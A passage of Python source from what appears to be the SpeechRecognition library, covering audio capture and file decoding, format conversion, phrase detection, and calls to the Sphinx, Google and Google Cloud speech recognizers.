format=self.format, rate=self.SAMPLE_RATE, frames_per_buffer=self.CHUNK,
input=True, # stream is an input stream
)
)
except:
self.audio.terminate()
raise
return self
def __exit__(self, exc_type, exc_value, traceback):
try:
self.stream.close()
finally:
self.stream = None
self.audio.terminate()
class MicrophoneStream(object):
def __init__(self, pyaudio_stream):
self.pyaudio_stream = pyaudio_stream
def read(self, size):
return self.pyaudio_stream.read(size, exception_on_overflow=False)
def close(self):
try:
# sometimes, if the stream isn't stopped, closing the stream throws an exception
if not self.pyaudio_stream.is_stopped():
self.pyaudio_stream.stop_stream()
finally:
self.pyaudio_stream.close()
class AudioFile(AudioSource):
"""
Creates a new ``AudioFile`` instance given a WAV/AIFF/FLAC audio file ``filename_or_fileobject``. Subclass of ``AudioSource``.
If ``filename_or_fileobject`` is a string, then it is interpreted as a path to an audio file on the filesystem. Otherwise, ``filename_or_fileobject`` should be a file-like object such as ``io.BytesIO`` or similar.
Note that functions that read from the audio (such as ``recognizer_instance.record`` or ``recognizer_instance.listen``) will move ahead in the stream. For example, if you execute ``recognizer_instance.record(audiofile_instance, duration=10)`` twice, the first time it will return the first 10 seconds of audio, and the second time it will return the 10 seconds of audio right after that. This is always reset to the beginning when entering an ``AudioFile`` context.
WAV files must be in PCM/LPCM format; WAVE_FORMAT_EXTENSIBLE and compressed WAV are not supported and may result in undefined behaviour.
Both AIFF and AIFF-C (compressed AIFF) formats are supported.
FLAC files must be in native FLAC format; OGG-FLAC is not supported and may result in undefined behaviour.
"""
def __init__(self, filename_or_fileobject):
if str is bytes: # Python 2 - if a file path is specified, it must either be a ``str`` instance or a ``unicode`` instance
assert isinstance(filename_or_fileobject, (type(""), type(u""))) or hasattr(filename_or_fileobject, "read"), "Given audio file must be a filename string or a file-like object"
else: # Python 3 - if a file path is specified, it must be a ``str`` instance
assert isinstance(filename_or_fileobject, str) or hasattr(filename_or_fileobject, "read"), "Given audio file must be a filename string or a file-like object"
self.filename_or_fileobject = filename_or_fileobject
self.stream = None
self.DURATION = None
def __enter__(self):
assert self.stream is None, "This audio source is already inside a context manager"
try:
# attempt to read the file as WAV
self.audio_reader = wave.open(self.filename_or_fileobject, "rb")
self.little_endian = True # RIFF WAV is a little-endian format (most ``audioop`` operations assume that the frames are stored in little-endian form)
except wave.Error:
try:
# attempt to read the file as AIFF
self.audio_reader = aifc.open(self.filename_or_fileobject, "rb")
self.little_endian = False # AIFF is a big-endian format
except aifc.Error:
# attempt to read the file as FLAC
if hasattr(self.filename_or_fileobject, "read"):
flac_data = self.filename_or_fileobject.read()
else:
with open(self.filename_or_fileobject, "rb") as f: flac_data = f.read()
# run the FLAC converter with the FLAC data to get the AIFF data
flac_converter = get_flac_converter()
process = subprocess.Popen([
flac_converter,
"--stdout", "--totally-silent", # put the resulting AIFF file in stdout, and make sure it's not mixed with any program output
"--decode", "--force-aiff-format", # decode the FLAC file into an AIFF file
"-", # the input FLAC file contents will be given in stdin
], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
aiff_data, stderr = process.communicate(flac_data)
aiff_file = io.BytesIO(aiff_data)
try:
self.audio_reader = aifc.open(aiff_file, "rb")
except aifc.Error:
raise ValueError("Audio file could not be read as PCM WAV, AIFF/AIFF-C, or Native FLAC; check if file is corrupted or in another format")
self.little_endian = False # AIFF is a big-endian format
assert 1 <= self.audio_reader.getnchannels() <= 2, "Audio must be mono or stereo"
self.SAMPLE_WIDTH = self.audio_reader.getsampwidth()
# 24-bit audio needs some special handling for old Python versions (workaround for https://bugs.python.org/issue12866)
samples_24_bit_pretending_to_be_32_bit = False
if self.SAMPLE_WIDTH == 3: # 24-bit audio
try: audioop.bias(b"", self.SAMPLE_WIDTH, 0) # test whether this sample width is supported (for example, ``audioop`` in Python 3.3 and below don't support sample width 3, while Python 3.4+ do)
except audioop.error: # this version of audioop doesn't support 24-bit audio (probably Python 3.3 or less)
samples_24_bit_pretending_to_be_32_bit = True # while the ``AudioFile`` instance will outwardly appear to be 32-bit, it will actually internally be 24-bit
self.SAMPLE_WIDTH = 4 # the ``AudioFile`` instance should present itself as a 32-bit stream now, since we'll be converting into 32-bit on the fly when reading
self.SAMPLE_RATE = self.audio_reader.getframerate()
self.CHUNK = 4096
self.FRAME_COUNT = self.audio_reader.getnframes()
self.DURATION = self.FRAME_COUNT / float(self.SAMPLE_RATE)
self.stream = AudioFile.AudioFileStream(self.audio_reader, self.little_endian, samples_24_bit_pretending_to_be_32_bit)
return self
def __exit__(self, exc_type, exc_value, traceback):
if not hasattr(self.filename_or_fileobject, "read"): # only close the file if it was opened by this class in the first place (if the file was originally given as a path)
self.audio_reader.close()
self.stream = None
self.DURATION = None
class AudioFileStream(object):
def __init__(self, audio_reader, little_endian, samples_24_bit_pretending_to_be_32_bit):
self.audio_reader = audio_reader # an audio file object (e.g., a `wave.Wave_read` instance)
self.little_endian = little_endian # whether the audio data is little-endian (when working with big-endian things, we'll have to convert it to little-endian before we process it)
self.samples_24_bit_pretending_to_be_32_bit = samples_24_bit_pretending_to_be_32_bit # this is true if the audio is 24-bit audio, but 24-bit audio isn't supported, so we have to pretend that this is 32-bit audio and convert it on the fly
def read(self, size=-1):
buffer = self.audio_reader.readframes(self.audio_reader.getnframes() if size == -1 else size)
if not isinstance(buffer, bytes): buffer = b"" # workaround for https://bugs.python.org/issue24608
sample_width = self.audio_reader.getsampwidth()
if not self.little_endian: # big endian format, convert to little endian on the fly
if hasattr(audioop, "byteswap"): # ``audioop.byteswap`` was only added in Python 3.4 (incidentally, that also means that we don't need to worry about 24-bit audio being unsupported, since Python 3.4+ always has that functionality)
buffer = audioop.byteswap(buffer, sample_width)
else: # manually reverse the bytes of each sample, which is slower but works well enough as a fallback
buffer = buffer[sample_width - 1::-1] + b"".join(buffer[i + sample_width:i:-1] for i in range(sample_width - 1, len(buffer), sample_width))
# workaround for https://bugs.python.org/issue12866
if self.samples_24_bit_pretending_to_be_32_bit: # we need to convert samples from 24-bit to 32-bit before we can process them with ``audioop`` functions
buffer = b"".join("\x00" + buffer[i:i + sample_width] for i in range(0, len(buffer), sample_width)) # since we're in little endian, we prepend a zero byte to each 24-bit sample to get a 32-bit sample
if self.audio_reader.getnchannels() != 1: # stereo audio
buffer = audioop.tomono(buffer, sample_width, 1, 1) # convert stereo audio data to mono
return buffer
class AudioData(object):
"""
Creates a new ``AudioData`` instance, which represents mono audio data.
The raw audio data is specified by ``frame_data``, which is a sequence of bytes representing audio samples. This is the frame data structure used by the PCM WAV format.
The width of each sample, in bytes, is specified by ``sample_width``. Each group of ``sample_width`` bytes represents a single audio sample.
The audio data is assumed to have a sample rate of ``sample_rate`` samples per second (Hertz).
Usually, instances of this class are obtained from ``recognizer_instance.record`` or ``recognizer_instance.listen``, or in the callback for ``recognizer_instance.listen_in_background``, rather than instantiating them directly.
"""
def __init__(self, frame_data, sample_rate, sample_width):
assert sample_rate > 0, "Sample rate must be a positive integer"
assert sample_width % 1 == 0 and 1 <= sample_width <= 4, "Sample width must be between 1 and 4 inclusive"
self.frame_data = frame_data
self.sample_rate = sample_rate
self.sample_width = int(sample_width)
def get_raw_data(self, convert_rate=None, convert_width=None):
"""
Returns a byte string representing the raw frame data for the audio represented by the ``AudioData`` instance.
If ``convert_rate`` is specified and the audio sample rate is not ``convert_rate`` Hz, the resulting audio is resampled to match.
If ``convert_width`` is specified and the audio samples are not ``convert_width`` bytes each, the resulting audio is converted to match.
Writing these bytes directly to a file results in a valid `RAW/PCM audio file <https://en.wikipedia.org/wiki/Raw_audio_format>`__.
"""
assert convert_rate is None or convert_rate > 0, "Sample rate to convert to must be a positive integer"
assert convert_width is None or (convert_width % 1 == 0 and 1 <= convert_width <= 4), "Sample width to convert to must be between 1 and 4 inclusive"
raw_data = self.frame_data
# make sure unsigned 8-bit audio (which uses unsigned samples) is handled like higher sample width audio (which uses signed samples)
if self.sample_width == 1:
raw_data = audioop.bias(raw_data, 1, -128) # subtract 128 from every sample to make them act like signed samples
# resample audio at the desired rate if specified
if convert_rate is not None and self.sample_rate != convert_rate:
raw_data, _ = audioop.ratecv(raw_data, self.sample_width, 1, self.sample_rate, convert_rate, None)
# convert samples to desired sample width if specified
if convert_width is not None and self.sample_width != convert_width:
if convert_width == 3: # we're converting the audio into 24-bit (workaround for https://bugs.python.org/issue12866)
raw_data = audioop.lin2lin(raw_data, self.sample_width, 4) # convert audio into 32-bit first, which is always supported
try: audioop.bias(b"", 3, 0) # test whether 24-bit audio is supported (for example, ``audioop`` in Python 3.3 and below don't support sample width 3, while Python 3.4+ do)
except audioop.error: # this version of audioop doesn't support 24-bit audio (probably Python 3.3 or less)
raw_data = b"".join(raw_data[i + 1:i + 4] for i in range(0, len(raw_data), 4)) # since we're in little endian, we discard the first byte from each 32-bit sample to get a 24-bit sample
else: # 24-bit audio fully supported, we don't need to shim anything
raw_data = audioop.lin2lin(raw_data, self.sample_width, convert_width)
else:
raw_data = audioop.lin2lin(raw_data, self.sample_width, convert_width)
# if the output is 8-bit audio with unsigned samples, convert the samples we've been treating as signed to unsigned again
if convert_width == 1:
raw_data = audioop.bias(raw_data, 1, 128) # add 128 to every sample to make them act like unsigned samples again
return raw_data
def get_wav_data(self, convert_rate=None, convert_width=None):
"""
Returns a byte string representing the contents of a WAV file containing the audio represented by the ``AudioData`` instance.
If ``convert_width`` is specified and the audio samples are not ``convert_width`` bytes each, the resulting audio is converted to match.
If ``convert_rate`` is specified and the audio sample rate is not ``convert_rate`` Hz, the resulting audio is resampled to match.
Writing these bytes directly to a file results in a valid `WAV file <https://en.wikipedia.org/wiki/WAV>`__.
"""
raw_data = self.get_raw_data(convert_rate, convert_width)
sample_rate = self.sample_rate if convert_rate is None else convert_rate
sample_width = self.sample_width if convert_width is None else convert_width
# generate the WAV file contents
with io.BytesIO() as wav_file:
wav_writer = wave.open(wav_file, "wb")
try: # note that we can't use context manager, since that was only added in Python 3.4
wav_writer.setframerate(sample_rate)
wav_writer.setsampwidth(sample_width)
wav_writer.setnchannels(1)
wav_writer.writeframes(raw_data)
wav_data = wav_file.getvalue()
finally: # make sure resources are cleaned up
wav_writer.close()
return wav_data
def get_aiff_data(self, convert_rate=None, convert_width=None):
"""
Returns a byte string representing the contents of an AIFF-C file containing the audio represented by the ``AudioData`` instance.
If ``convert_width`` is specified and the audio samples are not ``convert_width`` bytes each, the resulting audio is converted to match.
If ``convert_rate`` is specified and the audio sample rate is not ``convert_rate`` Hz, the resulting audio is resampled to match.
Writing these bytes directly to a file results in a valid `AIFF-C file <https://en.wikipedia.org/wiki/Audio_Interchange_File_Format>`__.
"""
raw_data = self.get_raw_data(convert_rate, convert_width)
sample_rate = self.sample_rate if convert_rate is None else convert_rate
sample_width = self.sample_width if convert_width is None else convert_width
# the AIFF format is big-endian, so we need to covnert the little-endian raw data to big-endian
if hasattr(audioop, "byteswap"): # ``audioop.byteswap`` was only added in Python 3.4
raw_data = audioop.byteswap(raw_data, sample_width)
else: # manually reverse the bytes of each sample, which is slower but works well enough as a fallback
raw_data = raw_data[sample_width - 1::-1] + b"".join(raw_data[i + sample_width:i:-1] for i in range(sample_width - 1, len(raw_data), sample_width))
# generate the AIFF-C file contents
with io.BytesIO() as aiff_file:
aiff_writer = aifc.open(aiff_file, "wb")
try: # note that we can't use context manager, since that was only added in Python 3.4
aiff_writer.setframerate(sample_rate)
aiff_writer.setsampwidth(sample_width)
aiff_writer.setnchannels(1)
aiff_writer.writeframes(raw_data)
aiff_data = aiff_file.getvalue()
finally: # make sure resources are cleaned up
aiff_writer.close()
return aiff_data
def get_flac_data(self, convert_rate=None, convert_width=None):
"""
Returns a byte string representing the contents of a FLAC file containing the audio represented by the ``AudioData`` instance.
Note that 32-bit FLAC is not supported. If the audio data is 32-bit and ``convert_width`` is not specified, then the resulting FLAC will be a 24-bit FLAC.
If ``convert_rate`` is specified and the audio sample rate is not ``convert_rate`` Hz, the resulting audio is resampled to match.
If ``convert_width`` is specified and the audio samples are not ``convert_width`` bytes each, the resulting audio is converted to match.
Writing these bytes directly to a file results in a valid `FLAC file <https://en.wikipedia.org/wiki/FLAC>`__.
"""
assert convert_width is None or (convert_width % 1 == 0 and 1 <= convert_width <= 3), "Sample width to convert to must be between 1 and 3 inclusive"
if self.sample_width > 3 and convert_width is None: # resulting WAV data would be 32-bit, which is not convertable to FLAC using our encoder
convert_width = 3 # the largest supported sample width is 24-bit, so we'll limit the sample width to that
# run the FLAC converter with the WAV data to get the FLAC data
wav_data = self.get_wav_data(convert_rate, convert_width)
flac_converter = get_flac_converter()
process = subprocess.Popen([
flac_converter,
"--stdout", "--totally-silent", # put the resulting FLAC file in stdout, and make sure it's not mixed with any program output
"--best", # highest level of compression available
"-", # the input FLAC file contents will be given in stdin
], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
flac_data, stderr = process.communicate(wav_data)
return flac_data
class Recognizer(AudioSource):
def __init__(self):
"""
Creates a new ``Recognizer`` instance, which represents a collection of speech recognition functionality.
"""
self.energy_threshold = 300 # minimum audio energy to consider for recording
self.dynamic_energy_threshold = True
self.dynamic_energy_adjustment_damping = 0.15
self.dynamic_energy_ratio = 1.5
self.pause_threshold = 0.8 # seconds of non-speaking audio before a phrase is considered complete
self.operation_timeout = None # seconds after an internal operation (e.g., an API request) starts before it times out, or ``None`` for no timeout
self.phrase_threshold = 0.3 # minimum seconds of speaking audio before we consider the speaking audio a phrase - values below this are ignored (for filtering out clicks and pops)
self.non_speaking_duration = 0.5 # seconds of non-speaking audio to keep on both sides of the recording
def record(self, source, duration=None, offset=None):
"""
Records up to ``duration`` seconds of audio from ``source`` (an ``AudioSource`` instance) starting at ``offset`` (or at the beginning if not specified) into an ``AudioData`` instance, which it returns.
If ``duration`` is not specified, then it will record until there is no more audio input.
"""
assert isinstance(source, AudioSource), "Source must be an audio source"
assert source.stream is not None, "Audio source must be entered before recording, see documentation for ``AudioSource``; are you using ``source`` outside of a ``with`` statement?"
frames = io.BytesIO()
seconds_per_buffer = (source.CHUNK + 0.0) / source.SAMPLE_RATE
elapsed_time = 0
offset_time = 0
offset_reached = False
while True: # loop for the total number of chunks needed
if offset and not offset_reached:
offset_time += seconds_per_buffer
if offset_time > offset:
offset_reached = True
buffer = source.stream.read(source.CHUNK)
if len(buffer) == 0: break
if offset_reached or not offset:
elapsed_time += seconds_per_buffer
if duration and elapsed_time > duration: break
frames.write(buffer)
frame_data = frames.getvalue()
frames.close()
return AudioData(frame_data, source.SAMPLE_RATE, source.SAMPLE_WIDTH)
def adjust_for_ambient_noise(self, source, duration=1):
"""
Adjusts the energy threshold dynamically using audio from ``source`` (an ``AudioSource`` instance) to account for ambient noise.
Intended to calibrate the energy threshold with the ambient energy level. Should be used on periods of audio without speech - will stop early if any speech is detected.
The ``duration`` parameter is the maximum number of seconds that it will dynamically adjust the threshold for before returning. This value should be at least 0.5 in order to get a representative sample of the ambient noise.
"""
assert isinstance(source, AudioSource), "Source must be an audio source"
assert source.stream is not None, "Audio source must be entered before adjusting, see documentation for ``AudioSource``; are you using ``source`` outside of a ``with`` statement?"
assert self.pause_threshold >= self.non_speaking_duration >= 0
seconds_per_buffer = (source.CHUNK + 0.0) / source.SAMPLE_RATE
elapsed_time = 0
# adjust energy threshold until a phrase starts
while True:
elapsed_time += seconds_per_buffer
if elapsed_time > duration: break
buffer = source.stream.read(source.CHUNK)
energy = audioop.rms(buffer, source.SAMPLE_WIDTH) # energy of the audio signal
# dynamically adjust the energy threshold using asymmetric weighted average
damping = self.dynamic_energy_adjustment_damping ** seconds_per_buffer # account for different chunk sizes and rates
target_energy = energy * self.dynamic_energy_ratio
self.energy_threshold = self.energy_threshold * damping + target_energy * (1 - damping)
def listen(self, source, timeout=None, phrase_time_limit=None):
"""
Records a single phrase from ``source`` (an ``AudioSource`` instance) into an ``AudioData`` instance, which it returns.
This is done by waiting until the audio has an energy above ``recognizer_instance.energy_threshold`` (the user has started speaking), and then recording until it encounters ``recognizer_instance.pause_threshold`` seconds of non-speaking or there is no more audio input. The ending silence is not included.
The ``timeout`` parameter is the maximum number of seconds that this will wait for a phrase to start before giving up and throwing an ``speech_recognition.WaitTimeoutError`` exception. If ``timeout`` is ``None``, there will be no wait timeout.
The ``phrase_time_limit`` parameter is the maximum number of seconds that this will allow a phrase to continue before stopping and returning the part of the phrase processed before the time limit was reached. The resulting audio will be the phrase cut off at the time limit. If ``phrase_timeout`` is ``None``, there will be no phrase time limit.
This operation will always complete within ``timeout + phrase_timeout`` seconds if both are numbers, either by returning the audio data, or by raising an exception.
"""
assert isinstance(source, AudioSource), "Source must be an audio source"
assert source.stream is not None, "Audio source must be entered before listening, see documentation for ``AudioSource``; are you using ``source`` outside of a ``with`` statement?"
assert self.pause_threshold >= self.non_speaking_duration >= 0
seconds_per_buffer = (source.CHUNK + 0.0) / source.SAMPLE_RATE
pause_buffer_count = int(math.ceil(self.pause_threshold / seconds_per_buffer)) # number of buffers of non-speaking audio during a phrase, before the phrase should be considered complete
phrase_buffer_count = int(math.ceil(self.phrase_threshold / seconds_per_buffer)) # minimum number of buffers of speaking audio before we consider the speaking audio a phrase
non_speaking_buffer_count = int(math.ceil(self.non_speaking_duration / seconds_per_buffer)) # maximum number of buffers of non-speaking audio to retain before and after a phrase
# read audio input for phrases until there is a phrase that is long enough
elapsed_time = 0 # number of seconds of audio read
buffer = b"" # an empty buffer means that the stream has ended and there is no data left to read
while True:
frames = collections.deque()
# store audio input until the phrase starts
while True:
# handle waiting too long for phrase by raising an exception
elapsed_time += seconds_per_buffer
if timeout and elapsed_time > timeout:
raise WaitTimeoutError("listening timed out while waiting for phrase to start")
buffer = source.stream.read(source.CHUNK)
if len(buffer) == 0: break # reached end of the stream
frames.append(buffer)
if len(frames) > non_speaking_buffer_count: # ensure we only keep the needed amount of non-speaking buffers
frames.popleft()
# detect whether speaking has started on audio input
energy = audioop.rms(buffer, source.SAMPLE_WIDTH) # energy of the audio signal
if energy > self.energy_threshold: break
# dynamically adjust the energy threshold using asymmetric weighted average
if self.dynamic_energy_threshold:
damping = self.dynamic_energy_adjustment_damping ** seconds_per_buffer # account for different chunk sizes and rates
target_energy = energy * self.dynamic_energy_ratio
self.energy_threshold = self.energy_threshold * damping + target_energy * (1 - damping)
# read audio input until the phrase ends
pause_count, phrase_count = 0, 0
phrase_start_time = elapsed_time
while True:
# handle phrase being too long by cutting off the audio
elapsed_time += seconds_per_buffer
if phrase_time_limit and elapsed_time - phrase_start_time > phrase_time_limit:
break
buffer = source.stream.read(source.CHUNK)
if len(buffer) == 0: break # reached end of the stream
frames.append(buffer)
phrase_count += 1
# check if speaking has stopped for longer than the pause threshold on the audio input
energy = audioop.rms(buffer, source.SAMPLE_WIDTH) # unit energy of the audio signal within the buffer
if energy > self.energy_threshold:
pause_count = 0
else:
pause_count += 1
if pause_count > pause_buffer_count: # end of the phrase
break
# check how long the detected phrase is, and retry listening if the phrase is too short
phrase_count -= pause_count # exclude the buffers for the pause before the phrase
if phrase_count >= phrase_buffer_count or len(buffer) == 0: break # phrase is long enough or we've reached the end of the stream, so stop listening
# obtain frame data
for i in range(pause_count - non_speaking_buffer_count): frames.pop() # remove extra non-speaking frames at the end
frame_data = b"".join(list(frames))
return AudioData(frame_data, source.SAMPLE_RATE, source.SAMPLE_WIDTH)
def listen_in_background(self, source, callback, phrase_time_limit=None):
"""
Spawns a thread to repeatedly record phrases from ``source`` (an ``AudioSource`` instance) into an ``AudioData`` instance and call ``callback`` with that ``AudioData`` instance as soon as each phrase are detected.
Returns a function object that, when called, requests that the background listener thread stop, and waits until it does before returning. The background thread is a daemon and will not stop the program from exiting if there are no other non-daemon threads.
Phrase recognition uses the exact same mechanism as ``recognizer_instance.listen(source)``. The ``phrase_time_limit`` parameter works in the same way as the ``phrase_time_limit`` parameter for ``recognizer_instance.listen(source)``, as well.
The ``callback`` parameter is a function that should accept two parameters - the ``recognizer_instance``, and an ``AudioData`` instance representing the captured audio. Note that ``callback`` function will be called from a non-main thread.
"""
assert isinstance(source, AudioSource), "Source must be an audio source"
running = [True]
def threaded_listen():
with source as s:
while running[0]:
try: # listen for 1 second, then check again if the stop function has been called
audio = self.listen(s, 1)
except WaitTimeoutError: # listening timed out, just try again
pass
else:
if running[0]: callback(self, audio)
def stopper():
running[0] = False
listener_thread.join() # block until the background thread is done, which can be up to 1 second
listener_thread = threading.Thread(target=threaded_listen)
listener_thread.daemon = True
listener_thread.start()
return stopper
def recognize_sphinx(self, audio_data, language="en-US", keyword_entries=None, show_all=False):
"""
Performs speech recognition on ``audio_data`` (an ``AudioData`` instance), using CMU Sphinx.
The recognition language is determined by ``language``, an RFC5646 language tag like ``"en-US"`` or ``"en-GB"``, defaulting to US English. Out of the box, only ``en-US`` is supported. See `Notes on using `PocketSphinx <https://github.com/Uberi/speech_recognition/blob/master/reference/pocketsphinx.rst>`__ for information about installing other languages. This document is also included under ``reference/pocketsphinx.rst``.
If specified, the keywords to search for are determined by ``keyword_entries``, an iterable of tuples of the form ``(keyword, sensitivity)``, where ``keyword`` is a phrase, and ``sensitivity`` is how sensitive to this phrase the recognizer should be, on a scale of 0 (very insensitive, more false negatives) to 1 (very sensitive, more false positives) inclusive. If not specified or ``None``, no keywords are used and Sphinx will simply transcribe whatever words it recognizes. Specifying ``keyword_entries`` is more accurate than just looking for those same keywords in non-keyword-based transcriptions, because Sphinx knows specifically what sounds to look for.
Returns the most likely transcription if ``show_all`` is false (the default). Otherwise, returns the Sphinx ``pocketsphinx.pocketsphinx.Decoder`` object resulting from the recognition.
Raises a ``speech_recognition.UnknownValueError`` exception if the speech is unintelligible. Raises a ``speech_recognition.RequestError`` exception if there are any issues with the Sphinx installation.
"""
assert isinstance(audio_data, AudioData), "``audio_data`` must be audio data"
assert isinstance(language, str), "``language`` must be a string"
assert keyword_entries is None or all(isinstance(keyword, str) and 0 <= sensitivity <= 1 for keyword, sensitivity in keyword_entries), "``keyword_entries`` must be ``None`` or a list of pairs of strings and numbers between 0 and 1"
# import the PocketSphinx speech recognition module
try:
from pocketsphinx import pocketsphinx
except ImportError:
raise RequestError("missing PocketSphinx module: ensure that PocketSphinx is set up correctly.")
except ValueError:
raise RequestError("bad PocketSphinx installation detected; make sure you have PocketSphinx version 0.0.9 or better.")
language_directory = os.path.join(os.path.dirname(os.path.realpath(__file__)), "pocketsphinx-data", language)
if not os.path.isdir(language_directory):
raise RequestError("missing PocketSphinx language data directory: \"{}\"".format(language_directory))
acoustic_parameters_directory = os.path.join(language_directory, "acoustic-model")
if not os.path.isdir(acoustic_parameters_directory):
raise RequestError("missing PocketSphinx language model parameters directory: \"{}\"".format(acoustic_parameters_directory))
language_model_file = os.path.join(language_directory, "language-model.lm.bin")
if not os.path.isfile(language_model_file):
raise RequestError("missing PocketSphinx language model file: \"{}\"".format(language_model_file))
phoneme_dictionary_file = os.path.join(language_directory, "pronounciation-dictionary.dict")
if not os.path.isfile(phoneme_dictionary_file):
raise RequestError("missing PocketSphinx phoneme dictionary file: \"{}\"".format(phoneme_dictionary_file))
# create decoder object
config = pocketsphinx.Decoder.default_config()
config.set_string("-hmm", acoustic_parameters_directory) # set the path of the hidden Markov model (HMM) parameter files
config.set_string("-lm", language_model_file)
config.set_string("-dict", phoneme_dictionary_file)
config.set_string("-logfn", os.devnull) # disable logging (logging causes unwanted output in terminal)
decoder = pocketsphinx.Decoder(config)
# obtain audio data
raw_data = audio_data.get_raw_data(convert_rate=16000, convert_width=2) # the included language models require audio to be 16-bit mono 16 kHz in little-endian format
# obtain recognition results
if keyword_entries is not None: # explicitly specified set of keywords
with tempfile_TemporaryDirectory() as temp_directory:
# generate a keywords file - Sphinx documentation recommendeds sensitivities between 1e-50 and 1e-5
keywords_path = os.path.join(temp_directory, "keyphrases.txt")
with open(keywords_path, "w") as f:
f.writelines("{} /1e{}/\n".format(keyword, 100 * sensitivity - 110) for keyword, sensitivity in keyword_entries)
# perform the speech recognition with the keywords file (this is inside the context manager so the file isn;t deleted until we're done)
decoder.set_kws("keywords", keywords_path)
decoder.set_search("keywords")
decoder.start_utt() # begin utterance processing
decoder.process_raw(raw_data, False, True) # process audio data with recognition enabled (no_search = False), as a full utterance (full_utt = True)
decoder.end_utt() # stop utterance processing
else: # no keywords, perform freeform recognition
decoder.start_utt() # begin utterance processing
decoder.process_raw(raw_data, False, True) # process audio data with recognition enabled (no_search = False), as a full utterance (full_utt = True)
decoder.end_utt() # stop utterance processing
if show_all: return decoder
# return results
hypothesis = decoder.hyp()
if hypothesis is not None: return hypothesis.hypstr
raise UnknownValueError() # no transcriptions available
def recognize_google(self, audio_data, key=None, language="en-US", show_all=False):
"""
Performs speech recognition on ``audio_data`` (an ``AudioData`` instance), using the Google Speech Recognition API.
The Google Speech Recognition API key is specified by ``key``. If not specified, it uses a generic key that works out of the box. This should generally be used for personal or testing purposes only, as it **may be revoked by Google at any time**.
To obtain your own API key, simply following the steps on the `API Keys <http://www.chromium.org/developers/how-tos/api-keys>`__ page at the Chromium Developers site. In the Google Developers Console, Google Speech Recognition is listed as "Speech API".
The recognition language is determined by ``language``, an RFC5646 language tag like ``"en-US"`` (US English) or ``"fr-FR"`` (International French), defaulting to US English. A list of supported language values can be found in this `StackOverflow answer <http://stackoverflow.com/a/14302134>`__.
Returns the most likely transcription if ``show_all`` is false (the default). Otherwise, returns the raw API response as a JSON dictionary.
Raises a ``speech_recognition.UnknownValueError`` exception if the speech is unintelligible. Raises a ``speech_recognition.RequestError`` exception if the speech recognition operation failed, if the key isn't valid, or if there is no internet connection.
"""
assert isinstance(audio_data, AudioData), "``audio_data`` must be audio data"
assert key is None or isinstance(key, str), "``key`` must be ``None`` or a string"
assert isinstance(language, str), "``language`` must be a string"
flac_data = audio_data.get_flac_data(
convert_rate=None if audio_data.sample_rate >= 8000 else 8000, # audio samples must be at least 8 kHz
convert_width=2 # audio samples must be 16-bit
)
if key is None: key = "AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw"
url = "http://www.google.com/speech-api/v2/recognize?{}".format(urlencode({
"client": "chromium",
"lang": language,
"key": key,
}))
request = Request(url, data=flac_data, headers={"Content-Type": "audio/x-flac; rate={}".format(audio_data.sample_rate)})
# obtain audio transcription results
try:
response = urlopen(request, timeout=self.operation_timeout)
except HTTPError as e:
raise RequestError("recognition request failed: {}".format(e.reason))
except URLError as e:
raise RequestError("recognition connection failed: {}".format(e.reason))
response_text = response.read().decode("utf-8")
# ignore any blank blocks
actual_result = []
for line in response_text.split("\n"):
if not line: continue
result = json.loads(line)["result"]
if len(result) != 0:
actual_result = result[0]
break
# return results
if show_all: return actual_result
if "alternative" not in actual_result: raise UnknownValueError()
for entry in actual_result["alternative"]:
if "transcript" in entry:
return entry["transcript"]
raise UnknownValueError() # no transcriptions available
def recognize_google_cloud(self, audio_data, language="en-US", preferred_phrases=None, show_all=False):
"""
Performs speech recognition on ``audio_data`` (an ``AudioData`` instance), using the Google Cloud Speech API.
This requires a Google Cloud Platform account; see the `Google Cloud Speech API Quickstart <https://cloud.google.com/speech/docs/getting-started>`__ for details and instructions.
The recognition language is determined by ``language``, which is a BCP-47 language tag like ``"en-US"`` (US English). For more information see the `RecognitionConfig documentation <https://cloud.google.com/speech/reference/rest/v1beta1/RecognitionConfig>`__.
If ``preferred_phrases`` is a list of phrase strings, those given phrases will be more likely to be recognized over similar-sounding alternatives. This is useful for things like keyword/command recognition or adding new phrases that aren't in Google's vocabulary. Note that the API imposes certain `restrictions on the list of phrase strings <https://cloud.google.com/speech/limits#content>`__.
Returns the most likely transcription if ``show_all`` is False (the default). Otherwise, returns the raw API response as a JSON dictionary.
Raises a ``speech_recognition.UnknownValueError`` exception if the speech is unintelligible. Raises a ``speech_recognition.RequestError`` exception if the speech recognition operation failed, if the credentials aren't valid, or if there is no Internet connection.
"""
assert isinstance(audio_data, AudioData), "`audio_data` must be audio data"
assert isinstance(language, str), "`language` must be a string"
assert preferred_phrases is None or all(isinstance(preferred_phrases, str) for preferred_phrases in preferred_phrases), "`preferred_phrases` must be a list of strings"
# See https://cloud.google.com/speech/reference/rest/v1beta1/RecognitionConfig
flac_data = audio_data.get_flac_data(
convert_rate=None if 8000 <= audio_data.sample_rate <= 48000 else max(8000, min(audio_data.sample_rate, 48000)), # audio sample rate must be between 8 kHz and 48 kHz inclusive - clamp sample rate into this range
convert_width=2 # audio samples must be 16-bit
)
speech_service = self.get_speech_service()
if preferred_phrases is None:
speech_config = {"encoding": "FLAC", "sampleRate": audio_data.sample_rate, "languageCode": language}
else:
speech_config = {"encoding": "FLAC", "sampleRate": audio_data.sample_rate, "languageCode": language, "speechContext": {"phrases": preferred_phrases}}
request = speech_service.speech().syncrecognize(body={"audio": {"content": base64.b64encode(flac_data).decode("utf8")}, "config": speech_config})
import googleapiclient.errors
try:
response = request.execute()
except googleapiclient.errors.HttpError as e:
raise RequestError(e)
except URLError as e:
raise RequestError("recognition connection failed: {0}".format(e.reason))
if show_all: return response
if "results" not in response or len(response["results"]) == 0: raise UnknownValueError()
transcript = ""
for result in response["results"]:
transcript += result["alternatives"][0]["transcript"].strip() + " "
return transcript
@staticmethod
def get_speech_service():
try:
from oauth2client.client import GoogleCredentials
from googleapiclient.discovery import build
credentials = GoogleCredentials.get_application_default()
return build("speech", "v1beta1", credentials=credentials)
except ImportError:
raise ImportError("Could not find google-api-python-client; check "
"installation")
def recognize_wit(self, audio_data, key, show_all=False):
"""
Performs speech recognition on ``audio_data`` (an ``AudioData`` instance), using the Wit.ai API.
The Wit.ai API key is specified by ``key``. Unfortunately, these are not available without `signing up for an account <https://wit.ai/>`__ and creating an app. You will need to add at least one intent to the app before you can see the API key, though the actual intent settings don't matter.
